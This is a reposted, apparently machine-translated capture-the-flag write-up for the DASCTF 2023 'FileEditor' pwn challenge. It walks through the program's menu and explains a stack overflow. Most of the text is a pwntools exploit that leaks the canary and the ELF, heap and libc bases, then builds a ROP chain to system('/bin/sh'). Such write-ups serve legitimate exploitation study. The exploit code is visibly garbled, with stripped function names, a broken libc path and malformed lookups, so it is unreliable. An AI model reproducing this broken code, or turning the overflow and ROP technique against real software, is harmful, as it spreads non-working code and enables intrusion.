Location>code7788 >text

DASCTF 2023 & 0X401 July Summer Challenge [PWN] (FileEditor Chapter)

Popularity:495 ℃/2024-07-24 16:41:35

DASCTF 2023 & 0X401 July Summer Challenge [PWN] (FileEditor Chapter)

Title Protection Situation (Protection of the Family Bucket)

64-bit ida reverse

Simulates a vim-like function that opens a file, prints its contents, inserts a line, deletes a line, copies a line, and edits a line, as well as finds and replaces characters, and then saves and exits.

Let's analyze them one by one.

is to open a file file. No will create

(Nothing special. Printed content)

3. Insert rows

Enter n, m, and the contents, inserting line m before line n

4. Delete rows

Still typing n and m, the function is to delete n lines after the starting line m

5. Copy rows

The function is to copy m rows of data from k rows to n rows.

6. Edit line

Enter the edited line and then the content

7. Finding Characters

will put our content on src first, src has 0x70 size

8. Replacement of characters

Likewise.

9. Save Exit

0. Exit Edit

Analysis: You can use the function of finding characters or replacing characters to put the content of the input file on the stack, enter 0x68+1 bytes to cover the end of canary, then print the canary will be printed incidentally, the same with this maneuver, leaking out the address of the libc address and the heap address, you can also do not need to directly use the binsh string inside the libc, and then finally through the editing of the The last edit writes the ropchain to the stack, and then hijacks the program stream to get the shell by overflow when looking up.

exp:

from pwn import *
context(log_level='debug',arch='amd64',os='linux')

io = process('./FileEditor')
#io = remote('',27825)
libc = ELF('/lib/x86_64-linux-gnu/.6')
def open():
    ('> choose:','1')


def instert(n,m,msg):
    ('> choose:','3')
    ('> To insert m lines before line n, please enter n m:',n)
    (m)
    ('> Please enter the content to be inserted in sequence:',msg)


def show():
    ('> choose:','2')


def edit(num,msg):
    ('> choose:','6')
    ('> Please enter the line number to be modified:',num)
    ('> Please enter the new content:',msg)

def find(string):
    ('> choose:','7')
    ('> Please enter the string to search for:',string)
    ('> Do you want to continue searching? (y/n)','n')

#(io)
open()
payload = 'b'+'a'*(0x68-1)
#(io)
instert('1','1',payload)
('\n')
find('b')
edit('1',payload)
('\n')
show()
('a'*103)
canary = u64((8))-0xa
success('canary---->'+hex(canary))

payload = b'b'+b'a'*(0x68-1) + p64(canary+ord('a')) + b'c'*8
edit('1',payload)
('\n')
#(io)
sleep(0.5)
show()
('c'*8)
elf_base  = u64((6).ljust(8,b'\x00')) - (0x59640d98850a -0x59640d987000)
success('elf_base----->'+hex(elf_base))

payload = payload = b'b'+b'a'*(0x68-1) + p64(canary+ord('a')) + b'c'*24 + b'd'*8
edit('1',payload)
('\n')
sleep(0.5)
show()
('d'*8)
heap = u64((6).ljust(8,b'\x00')) -(0x5ab985b9d2a0 - 0x5ab985b9d000) + 0x96
success('heap----->'+hex(heap))

payload = b'b'+b'a'*(0x68-1) + p64(canary+ord('a')) + b'c'*48 + b'd'*8
edit('1',payload)
('\n')
sleep(0.5)
#(io)
show()

('d'*8)
libc_base = u64((6).ljust(8,b'\x00')) - (0x796487e29d90 -  0x796487e28000) + 0x86 -0x28000
success('libc_base---->'+hex(libc_base))
pause()
pop_rdi = elf_base + 0x0000000000002ac3 #: pop rdi ; ret 
pop_rsi = elf_base + 0x0000000000002ac1 #: pop rsi ; pop r15 ; ret
ret = elf_base + 0x000000000000101a #: ret 
system = libc_base + ['system']# -0x28000
binsh  = libc_base + next(('/bin/sh\0'))

#payload = b'b'+b'a'*(0x68-1) + p64(canary) + b'/bin/sh\x00' + p64(ret)
#payload += p64(pop_rdi) + p64(heap + 0x15e4) + p64(system)
payload = b'b'+b'a'*(0x68-1) + p64(canary) + p64(0xdeadbeef) + p64(ret) +p64(pop_rdi) + p64(binsh) + p64(system)

#(io)
edit('1',payload)
('\n')
sleep(0.5)
#(io)
find('b')

()